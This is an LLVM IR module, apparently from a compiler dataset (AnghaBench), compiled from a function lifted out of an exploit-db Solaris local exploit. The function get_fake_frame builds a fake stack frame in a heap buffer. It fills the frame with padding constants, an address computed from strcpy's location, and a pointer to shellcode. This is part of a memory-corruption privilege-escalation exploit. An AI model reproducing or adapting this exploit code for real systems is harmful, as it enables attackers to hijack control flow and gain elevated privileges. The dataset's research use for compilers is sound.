; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/solaris/local/extr_114.c_get_fake_frame.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/solaris/local/extr_114.c_get_fake_frame.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@FRAME_SIZE = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [7 x i8] c"malloc\00", align 1
@SHELLCODE_ADDR = common dso_local global i64 0, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i8* @get_fake_frame(i64 %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i64, align 8
  %4 = alloca i64, align 8
  %5 = alloca i64*, align 8
  %6 = alloca i8*, align 8
  store i64 %0, i64* %3, align 8
  %7 = load i64, i64* @FRAME_SIZE, align 8
  %8 = add nsw i64 %7, 1
  %9 = call i64 @malloc(i64 %8)
  %10 = inttoptr i64 %9 to i8*
  store i8* %10, i8** %6, align 8
  %11 = load i8*, i8** %6, align 8
  %12 = icmp ne i8* %11, null
  br i1 %12, label %15, label %13

13:                                               ; preds = %1
  %14 = call i32 @perror(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str, i64 0, i64 0))
  store i8* null, i8** %2, align 8
  br label %64

15:                                               ; preds = %1
  %16 = call i32 (...) @get_strcpy_addr()
  %17 = add nsw i32 %16, 94208
  %18 = sext i32 %17 to i64
  store i64 %18, i64* %4, align 8
  %19 = load i8*, i8** %6, align 8
  %20 = bitcast i8* %19 to i64*
  store i64* %20, i64** %5, align 8
  %21 = load i64*, i64** %5, align 8
  %22 = getelementptr inbounds i64, i64* %21, i32 1
  store i64* %22, i64** %5, align 8
  store i64 1111836486, i64* %21, align 8
  %23 = load i64*, i64** %5, align 8
  %24 = getelementptr inbounds i64, i64* %23, i32 1
  store i64* %24, i64** %5, align 8
  store i64 3735936685, i64* %23, align 8
  %25 = load i64*, i64** %5, align 8
  %26 = getelementptr inbounds i64, i64* %25, i32 1
  store i64* %26, i64** %5, align 8
  store i64 3735936685, i64* %25, align 8
  %27 = load i64*, i64** %5, align 8
  %28 = getelementptr inbounds i64, i64* %27, i32 1
  store i64* %28, i64** %5, align 8
  store i64 3735936685, i64* %27, align 8
  %29 = load i64*, i64** %5, align 8
  %30 = getelementptr inbounds i64, i64* %29, i32 1
  store i64* %30, i64** %5, align 8
  store i64 3735936685, i64* %29, align 8
  %31 = load i64*, i64** %5, align 8
  %32 = getelementptr inbounds i64, i64* %31, i32 1
  store i64* %32, i64** %5, align 8
  store i64 3735936685, i64* %31, align 8
  %33 = load i64*, i64** %5, align 8
  %34 = getelementptr inbounds i64, i64* %33, i32 1
  store i64* %34, i64** %5, align 8
  store i64 3735936685, i64* %33, align 8
  %35 = load i64*, i64** %5, align 8
  %36 = getelementptr inbounds i64, i64* %35, i32 1
  store i64* %36, i64** %5, align 8
  store i64 3735936685, i64* %35, align 8
  %37 = load i64, i64* %4, align 8
  %38 = load i64*, i64** %5, align 8
  %39 = getelementptr inbounds i64, i64* %38, i32 1
  store i64* %39, i64** %5, align 8
  store i64 %37, i64* %38, align 8
  %40 = load i64, i64* @SHELLCODE_ADDR, align 8
  %41 = load i64, i64* %3, align 8
  %42 = add nsw i64 %40, %41
  %43 = load i64*, i64** %5, align 8
  %44 = getelementptr inbounds i64, i64* %43, i32 1
  store i64* %44, i64** %5, align 8
  store i64 %42, i64* %43, align 8
  %45 = load i64*, i64** %5, align 8
  %46 = getelementptr inbounds i64, i64* %45, i32 1
  store i64* %46, i64** %5, align 8
  store i64 3735936685, i64* %45, align 8
  %47 = load i64*, i64** %5, align 8
  %48 = getelementptr inbounds i64, i64* %47, i32 1
  store i64* %48, i64** %5, align 8
  store i64 3735936685, i64* %47, align 8
  %49 = load i64*, i64** %5, align 8
  %50 = getelementptr inbounds i64, i64* %49, i32 1
  store i64* %50, i64** %5, align 8
  store i64 3735936685, i64* %49, align 8
  %51 = load i64*, i64** %5, align 8
  %52 = getelementptr inbounds i64, i64* %51, i32 1
  store i64* %52, i64** %5, align 8
  store i64 3735936685, i64* %51, align 8
  %53 = load i64, i64* %4, align 8
  %54 = add nsw i64 %53, 512
  %55 = load i64*, i64** %5, align 8
  %56 = getelementptr inbounds i64, i64* %55, i32 1
  store i64* %56, i64** %5, align 8
  store i64 %54, i64* %55, align 8
  %57 = load i64, i64* %4, align 8
  %58 = sub nsw i64 %57, 8
  %59 = load i64*, i64** %5, align 8
  %60 = getelementptr inbounds i64, i64* %59, i32 1
  store i64* %60, i64** %5, align 8
  store i64 %58, i64* %59, align 8
  %61 = load i64*, i64** %5, align 8
  %62 = getelementptr inbounds i64, i64* %61, i32 1
  store i64* %62, i64** %5, align 8
  store i64 0, i64* %61, align 8
  %63 = load i8*, i8** %6, align 8
  store i8* %63, i8** %2, align 8
  br label %64

64:                                               ; preds = %15, %13
  %65 = load i8*, i8** %2, align 8
  ret i8* %65
}

declare dso_local i64 @malloc(i64) #1

declare dso_local i32 @perror(i8*) #1

declare dso_local i32 @get_strcpy_addr(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
